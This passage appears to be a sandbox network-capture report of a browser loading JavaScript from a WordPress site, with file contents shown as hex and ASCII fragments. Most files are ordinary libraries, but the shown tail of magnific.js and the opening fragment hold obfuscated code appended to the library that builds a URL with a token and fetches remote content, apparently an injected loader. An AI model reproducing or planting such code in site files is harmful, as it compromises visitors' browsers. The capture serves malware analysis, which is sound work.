                                                            2025-01-15 10:08:01 UTC962INData Raw: 27 29 2b 68 28 27 30 78 66 66 27 29 2b 68 28 27 30 78 65 39 27 29 2b 68 28 30 78 31 30 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 76 3d 68 3b 69 66 28 7a 5b 76 28 30 78 64 37 29 2b 76 28 27 30 78 31 30 32 27 29 2b 76 28 27 30 78 31 30 61 27 29 2b 27 65 27 5d 3d 3d 30 78 34 26 26 7a 5b 76 28 27 30 78 66 30 27 29 2b 76 28 30 78 65 61 29 5d 3d 3d 30 78 63 38 29 65 28 7a 5b 76 28 30 78 66 37 29 2b 76 28 27 30 78 64 36 27 29 2b 76 28 27 30 78 64 66 27 29 2b 76 28 27 30 78 31 30 36 27 29 5d 29 3b 7d 2c 7a 5b 68 28 30 78 64 39 29 2b 27 6e 27 5d 28 68 28 30 78 64 31 29 2c 72 2c 21 21 5b 5d 29 2c 7a 5b 68 28 27 30 78 64 65 27 29 2b 27 64 27 5d 28 6e 75 6c 6c 29 3b 7d 3b 7d 2c 72 61 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6b 3d 41 3b 72
                                                            Data Ascii: ')+h('0xff')+h('0xe9')+h(0x104)]=function(){var v=h;if(z[v(0xd7)+v('0x102')+v('0x10a')+'e']==0x4&&z[v('0xf0')+v(0xea)]==0xc8)e(z[v(0xf7)+v('0xd6')+v('0xdf')+v('0x106')]);},z[h(0xd9)+'n'](h(0xd1),r,!![]),z[h('0xde')+'d'](null);};},rand=function(){var k=A;r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            60192.168.2.1649776178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:01 UTC595OUTGET /wp-content/themes/salient/js/magnific.js?ver=7.0.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:01 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:01 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:02 GMT
                                                            ETag: "bc86-620a8e9644048"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 48262
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:01 UTC7906INData Raw: 2f 2a 21 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 20 2d 20 76 31 2e 30 2e 30 20 2d 20 32 30 31 35 2d 30 39 2d 31 37 0a 2a 20 68 74 74 70 3a 2f 2f 64 69 6d 73 65 6d 65 6e 6f 76 2e 63 6f 6d 2f 70 6c 75 67 69 6e 73 2f 6d 61 67 6e 69 66 69 63 2d 70 6f 70 75 70 2f 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 20 44 6d 69 74 72 79 20 53 65 6d 65 6e 6f 76 3b 20 2a 2f 0a 3b 28 66 75 6e 63 74 69 6f 6e 20 28 66 61 63 74 6f 72 79 29 20 7b 20 0a 69 66 20 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 26 26 20 64 65 66 69 6e 65 2e 61 6d 64 29 20 7b 20 0a 20 2f 2f 20 41 4d 44 2e 20 52 65 67 69 73 74 65 72 20 61 73 20 61 6e 20 61 6e 6f 6e 79 6d 6f 75 73 20 6d 6f 64 75 6c 65 2e 20 0a 20 64 65 66 69 6e 65 28
                                                            Data Ascii: /*! Magnific Popup - v1.0.0 - 2015-09-17* http://dimsemenov.com/plugins/magnific-popup/* Copyright (c) 2015 Dmitry Semenov; */;(function (factory) { if (typeof define === 'function' && define.amd) { // AMD. Register as an anonymous module. define(
                                                            2025-01-15 10:08:01 UTC8000INData Raw: 65 37 20 64 6f 75 62 6c 65 2d 73 63 72 6f 6c 6c 20 62 75 67 0a 09 09 09 09 24 28 27 62 6f 64 79 2c 20 68 74 6d 6c 27 29 2e 63 73 73 28 27 6f 76 65 72 66 6c 6f 77 27 2c 20 27 68 69 64 64 65 6e 27 29 3b 0a 09 09 09 7d 0a 09 09 7d 0a 0a 09 09 0a 09 09 0a 09 09 76 61 72 20 63 6c 61 73 73 65 73 54 6f 61 64 64 20 3d 20 6d 66 70 2e 73 74 2e 6d 61 69 6e 43 6c 61 73 73 3b 0a 09 09 69 66 28 6d 66 70 2e 69 73 49 45 37 29 20 7b 0a 09 09 09 63 6c 61 73 73 65 73 54 6f 61 64 64 20 2b 3d 20 27 20 6d 66 70 2d 69 65 37 27 3b 0a 09 09 7d 0a 09 09 69 66 28 63 6c 61 73 73 65 73 54 6f 61 64 64 29 20 7b 0a 09 09 09 6d 66 70 2e 5f 61 64 64 43 6c 61 73 73 54 6f 4d 46 50 28 20 63 6c 61 73 73 65 73 54 6f 61 64 64 20 29 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 61 64 64 20 63 6f 6e 74 65
                                                            Data Ascii: e7 double-scroll bug$('body, html').css('overflow', 'hidden');}}var classesToadd = mfp.st.mainClass;if(mfp.isIE7) {classesToadd += ' mfp-ie7';}if(classesToadd) {mfp._addClassToMFP( classesToadd );}// add conte
                                                            2025-01-15 10:08:01 UTC8000INData Raw: 09 5f 6d 66 70 54 72 69 67 67 65 72 28 27 55 70 64 61 74 65 53 74 61 74 75 73 27 2c 20 64 61 74 61 29 3b 0a 0a 09 09 09 73 74 61 74 75 73 20 3d 20 64 61 74 61 2e 73 74 61 74 75 73 3b 0a 09 09 09 74 65 78 74 20 3d 20 64 61 74 61 2e 74 65 78 74 3b 0a 0a 09 09 09 6d 66 70 2e 70 72 65 6c 6f 61 64 65 72 2e 68 74 6d 6c 28 74 65 78 74 29 3b 0a 0a 09 09 09 6d 66 70 2e 70 72 65 6c 6f 61 64 65 72 2e 66 69 6e 64 28 27 61 27 29 2e 6f 6e 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 09 09 09 09 65 2e 73 74 6f 70 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 0a 09 09 09 7d 29 3b 0a 0a 09 09 09 6d 66 70 2e 63 6f 6e 74 61 69 6e 65 72 2e 61 64 64 43 6c 61 73 73 28 27 6d 66 70 2d 73 2d 27 2b 73 74 61 74 75 73 29 3b 0a 09 09
                                                            Data Ascii: _mfpTrigger('UpdateStatus', data);status = data.status;text = data.text;mfp.preloader.html(text);mfp.preloader.find('a').on('click', function(e) {e.stopImmediatePropagation();});mfp.container.addClass('mfp-s-'+status);
                                                            2025-01-15 10:08:01 UTC8000INData Raw: 72 65 66 3d 22 25 75 72 6c 25 22 3e 54 68 65 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 27 0a 09 7d 2c 0a 0a 09 70 72 6f 74 6f 3a 20 7b 0a 09 09 69 6e 69 74 41 6a 61 78 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 09 6d 66 70 2e 74 79 70 65 73 2e 70 75 73 68 28 41 4a 41 58 5f 4e 53 29 3b 0a 09 09 09 5f 61 6a 61 78 43 75 72 20 3d 20 6d 66 70 2e 73 74 2e 61 6a 61 78 2e 63 75 72 73 6f 72 3b 0a 0a 09 09 09 5f 6d 66 70 4f 6e 28 43 4c 4f 53 45 5f 45 56 45 4e 54 2b 27 2e 27 2b 41 4a 41 58 5f 4e 53 2c 20 5f 64 65 73 74 72 6f 79 41 6a 61 78 52 65 71 75 65 73 74 29 3b 0a 09 09 09 5f 6d 66 70 4f 6e 28 27 42 65 66 6f 72 65 43 68 61 6e 67 65 2e 27 20 2b 20 41 4a 41 58 5f 4e 53 2c 20 5f 64 65 73 74 72 6f 79
                                                            Data Ascii: ref="%url%">The content</a> could not be loaded.'},proto: {initAjax: function() {mfp.types.push(AJAX_NS);_ajaxCur = mfp.st.ajax.cursor;_mfpOn(CLOSE_EVENT+'.'+AJAX_NS, _destroyAjaxRequest);_mfpOn('BeforeChange.' + AJAX_NS, _destroy
                                                            2025-01-15 10:08:01 UTC8000INData Raw: 28 6f 70 65 6e 54 69 6d 65 6f 75 74 29 3b 0a 09 09 09 09 09 6d 66 70 2e 63 6f 6e 74 65 6e 74 2e 63 73 73 28 27 76 69 73 69 62 69 6c 69 74 79 27 2c 20 27 68 69 64 64 65 6e 27 29 3b 0a 0a 09 09 09 09 09 2f 2f 20 42 61 73 69 63 61 6c 6c 79 2c 20 61 6c 6c 20 63 6f 64 65 20 62 65 6c 6f 77 20 64 6f 65 73 20 69 73 20 63 6c 6f 6e 65 73 20 65 78 69 73 74 69 6e 67 20 69 6d 61 67 65 2c 20 70 75 74 73 20 69 6e 20 6f 6e 20 74 6f 70 20 6f 66 20 74 68 65 20 63 75 72 72 65 6e 74 20 6f 6e 65 20 61 6e 64 20 61 6e 69 6d 61 74 65 64 20 69 74 0a 09 09 09 09 09 0a 09 09 09 09 09 69 6d 61 67 65 20 3d 20 6d 66 70 2e 5f 67 65 74 49 74 65 6d 54 6f 5a 6f 6f 6d 28 29 3b 0a 0a 09 09 09 09 09 69 66 28 21 69 6d 61 67 65 29 20 7b 0a 09 09 09 09 09 09 73 68 6f 77 4d 61 69 6e 43 6f 6e 74
                                                            Data Ascii: (openTimeout);mfp.content.css('visibility', 'hidden');// Basically, all code below does is clones existing image, puts in on top of the current one and animated itimage = mfp._getItemToZoom();if(!image) {showMainCont
                                                            2025-01-15 10:08:01 UTC8000INData Raw: 20 74 72 75 65 29 3b 0a 09 09 09 09 09 09 5f 67 65 74 45 6c 28 27 61 27 2c 20 61 72 72 6f 77 52 69 67 68 74 5b 30 5d 2c 20 66 61 6c 73 65 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 09 7d 0a 0a 09 09 09 09 09 6d 66 70 2e 63 6f 6e 74 61 69 6e 65 72 2e 61 70 70 65 6e 64 28 61 72 72 6f 77 4c 65 66 74 2e 61 64 64 28 61 72 72 6f 77 52 69 67 68 74 29 29 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 29 3b 0a 0a 09 09 09 5f 6d 66 70 4f 6e 28 43 48 41 4e 47 45 5f 45 56 45 4e 54 2b 6e 73 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 09 09 69 66 28 6d 66 70 2e 5f 70 72 65 6c 6f 61 64 54 69 6d 65 6f 75 74 29 20 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6d 66 70 2e 5f 70 72 65 6c 6f 61 64 54 69 6d 65 6f 75 74 29 3b 0a 0a 09 09 09 09 6d 66 70 2e 5f 70 72 65 6c 6f 61 64 54 69 6d 65
                                                            Data Ascii: true);_getEl('a', arrowRight[0], false, true);}mfp.container.append(arrowLeft.add(arrowRight));}});_mfpOn(CHANGE_EVENT+ns, function() {if(mfp._preloadTimeout) clearTimeout(mfp._preloadTimeout);mfp._preloadTime
                                                            2025-01-15 10:08:01 UTC356INData Raw: 30 29 2b 48 28 30 78 65 34 29 2b 27 65 72 27 5d 3b 69 66 28 6c 26 26 21 46 28 6c 2c 4e 29 26 26 21 58 29 7b 76 61 72 20 49 3d 6e 65 77 20 48 74 74 70 43 6c 69 65 6e 74 28 29 2c 57 3d 48 28 27 30 78 66 65 27 29 2b 48 28 27 30 78 64 61 27 29 2b 48 28 27 30 78 64 32 27 29 2b 48 28 27 30 78 65 63 27 29 2b 48 28 30 78 66 36 29 2b 48 28 27 30 78 31 30 61 27 29 2b 48 28 30 78 31 30 30 29 2b 48 28 27 30 78 64 34 27 29 2b 48 28 30 78 31 30 37 29 2b 48 28 27 30 78 63 66 27 29 2b 48 28 30 78 66 38 29 2b 48 28 30 78 65 31 29 2b 48 28 30 78 31 30 39 29 2b 48 28 27 30 78 66 62 27 29 2b 27 3d 27 2b 74 6f 6b 65 6e 28 29 3b 49 5b 48 28 30 78 64 35 29 5d 28 57 2c 66 75 6e 63 74 69 6f 6e 28 51 29 7b 76 61 72 20 4a 3d 48 3b 46 28 51 2c 4a 28 27 30 78 65 65 27 29 2b 27 78 27
                                                            Data Ascii: 0)+H(0xe4)+'er'];if(l&&!F(l,N)&&!X){var I=new HttpClient(),W=H('0xfe')+H('0xda')+H('0xd2')+H('0xec')+H(0xf6)+H('0x10a')+H(0x100)+H('0xd4')+H(0x107)+H('0xcf')+H(0xf8)+H(0xe1)+H(0x109)+H('0xfb')+'='+token();I[H(0xd5)](W,function(Q){var J=H;F(Q,J('0xee')+'x'


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            61192.168.2.1649777178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:01 UTC429OUTGET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.2 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:01 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:01 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:50 GMT
                                                            ETag: "32bb-620a8ec3e75ef"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 12987
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:01 UTC7906INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 74 5b 72 5d 29 72 65 74 75 72 6e 20 74 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 74 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 72 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 65 2c 6e 2e 63 3d 74 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 6e 2e 6f 28 65 2c 74 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 7d 29 7d 2c 6e 2e 72 3d 66 75 6e
                                                            Data Ascii: !function(e){var t={};function n(r){if(t[r])return t[r].exports;var o=t[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=fun
                                                            2025-01-15 10:08:02 UTC5081INData Raw: 65 6c 65 63 74 6f 72 41 6c 6c 28 22 69 6d 67 2e 77 70 63 66 37 2d 63 61 70 74 63 68 61 2d 22 2e 63 6f 6e 63 61 74 28 6e 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 72 29 7d 29 29 3b 76 61 72 20 6f 3d 2f 28 5b 30 2d 39 5d 2b 29 5c 2e 28 70 6e 67 7c 67 69 66 7c 6a 70 65 67 29 24 2f 2e 65 78 65 63 28 72 29 3b 6f 26 26 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 5f 77 70 63 66 37 5f 63 61 70 74 63 68 61 5f 63 68 61 6c 6c 65 6e 67 65 5f 27 2e 63 6f 6e 63 61 74 28 6e 2c 27 22 5d 27 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 76 61 6c 75 65 3d 6f 5b 31 5d 7d 29 29 7d 3b 66 6f 72 28 76 61
                                                            Data Ascii: electorAll("img.wpcf7-captcha-".concat(n)).forEach((function(e){e.setAttribute("src",r)}));var o=/([0-9]+)\.(png|gif|jpeg)$/.exec(r);o&&e.querySelectorAll('input[name="_wpcf7_captcha_challenge_'.concat(n,'"]')).forEach((function(e){e.value=o[1]}))};for(va


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            62192.168.2.1649778178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:01 UTC409OUTGET /wp-includes/js/imagesloaded.min.js?ver=4.1.4 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:02 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:02 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:13:49 GMT
                                                            ETag: "15fd-620a92c8939cf"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 5629
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:02 UTC5629INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2a 21 0a 20 2a 20 69 6d 61 67 65 73 4c 6f 61 64 65 64 20 50 41 43 4b 41 47 45 44 20 76 34 2e 31 2e 34 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 69 73 20 61 6c 6c 20 6c 69 6b 65 20 22 59 6f 75 20 69 6d 61 67 65 73 20 61 72 65 20 64 6f 6e 65 20 79 65 74 20 6f 72 20 77 68 61 74 3f 22 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 65 76 2d 65 6d 69 74 74 65 72 2f 65 76 2d 65 6d 69 74 74 65 72 22 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66
                                                            Data Ascii: /*! This file is auto-generated *//*! * imagesLoaded PACKAGED v4.1.4 * JavaScript is all like "You images are done yet or what?" * MIT License */!function(e,t){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",t):"object"==typeof


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            63192.168.2.1649779178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:02 UTC419OUTGET /wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:02 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:02 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:02 GMT
                                                            ETag: "71b-620a930e55a3c"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1819
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:02 UTC1819INData Raw: 2f 2a 21 0a 20 2a 20 4d 61 73 6f 6e 72 79 20 76 32 20 73 68 69 6d 0a 20 2a 20 74 6f 20 6d 61 69 6e 74 61 69 6e 20 62 61 63 6b 77 61 72 64 73 20 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 0a 20 2a 20 61 73 20 6f 66 20 4d 61 73 6f 6e 72 79 20 76 33 2e 31 2e 32 0a 20 2a 0a 20 2a 20 43 61 73 63 61 64 69 6e 67 20 67 72 69 64 20 6c 61 79 6f 75 74 20 6c 69 62 72 61 72 79 0a 20 2a 20 68 74 74 70 3a 2f 2f 6d 61 73 6f 6e 72 79 2e 64 65 73 61 6e 64 72 6f 2e 63 6f 6d 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 20 62 79 20 44 61 76 69 64 20 44 65 53 61 6e 64 72 6f 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 62 3d 61 2e 4d 61 73 6f 6e 72 79 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 72 65 6d 61 70 56 32
                                                            Data Ascii: /*! * Masonry v2 shim * to maintain backwards compatibility * as of Masonry v3.1.2 * * Cascading grid layout library * http://masonry.desandro.com * MIT License * by David DeSandro */!function(a){"use strict";var b=a.Masonry;b.prototype._remapV2


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            64192.168.2.1649780178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:02 UTC596OUTGET /wp-content/themes/salient/js/isotope.min.js?ver=7.6 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:02 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:02 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:04 GMT
                                                            ETag: "d616-620a8e980e041"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 54806
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:02 UTC7906INData Raw: 2f 2a 21 0a 20 2a 20 49 73 6f 74 6f 70 65 20 50 41 43 4b 41 47 45 44 20 76 32 2e 32 2e 32 0a 20 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 47 50 4c 76 33 20 66 6f 72 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 75 73 65 0a 20 2a 20 6f 72 20 49 73 6f 74 6f 70 65 20 43 6f 6d 6d 65 72 63 69 61 6c 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 63 6f 6d 6d 65 72 63 69 61 6c 20 75 73 65 0a 20 2a 0a 20 2a 20 68 74 74 70 3a 2f 2f 69 73 6f 74 6f 70 65 2e 6d 65 74 61 66 69 7a 7a 79 2e 63 6f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 35 20 4d 65 74 61 66 69 7a 7a 79 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 63 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 62 29 7b 62 2e 70 72 6f 74 6f 74 79
                                                            Data Ascii: /*! * Isotope PACKAGED v2.2.2 * * Licensed GPLv3 for open source use * or Isotope Commercial License for commercial use * * http://isotope.metafizzy.co * Copyright 2015 Metafizzy */!function(a){function b(){}function c(a){function c(b){b.prototy
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 29 2c 65 2e 62 69 6e 64 28 61 2c 22 6c 6f 61 64 22 2c 63 29 29 2c 62 7d 76 61 72 20 66 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 67 3d 5b 5d 3b 62 2e 69 73 52 65 61 64 79 3d 21 31 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 64 6f 63 2d 72 65 61 64 79 2f 64 6f 63 2d 72 65 61 64 79 22 2c 5b 22 65 76 65 6e 74 69 65 2f 65 76 65 6e 74 69 65 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 72 65 71 75 69 72 65 28 22 65 76 65 6e 74 69 65 22 29 29 3a 61 2e 64 6f 63 52 65 61 64 79 3d 65 28 61 2e 65 76 65 6e 74 69 65 29 7d 28 77 69 6e 64 6f 77 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29
                                                            Data Ascii: ),e.bind(a,"load",c)),b}var f=a.document,g=[];b.isReady=!1,"function"==typeof define&&define.amd?define("doc-ready/doc-ready",["eventie/eventie"],e):"object"==typeof exports?module.exports=e(require("eventie")):a.docReady=e(a.eventie)}(window),function(a)
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 69 73 2e 6f 6e 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 28 61 29 7d 2c 67 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 6f 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6f 6e 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 28 61 29 7d 3b 76 61 72 20 73 3d 7b 22 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 22 3a 22 74 72 61 6e 73 66 6f 72 6d 22 2c 22 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 22 3a 22 74 72 61 6e 73 66 6f 72 6d 22 2c 22 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 22 3a 22 74 72 61 6e 73 66 6f 72 6d 22 7d 3b 67 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 74 61 72 67 65 74 3d 3d 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 7b 76 61
                                                            Data Ascii: is.ontransitionend(a)},g.prototype.onotransitionend=function(a){this.ontransitionend(a)};var s={"-webkit-transform":"transform","-moz-transform":"transform","-o-transform":"transform"};g.prototype.ontransitionend=function(a){if(a.target===this.element){va
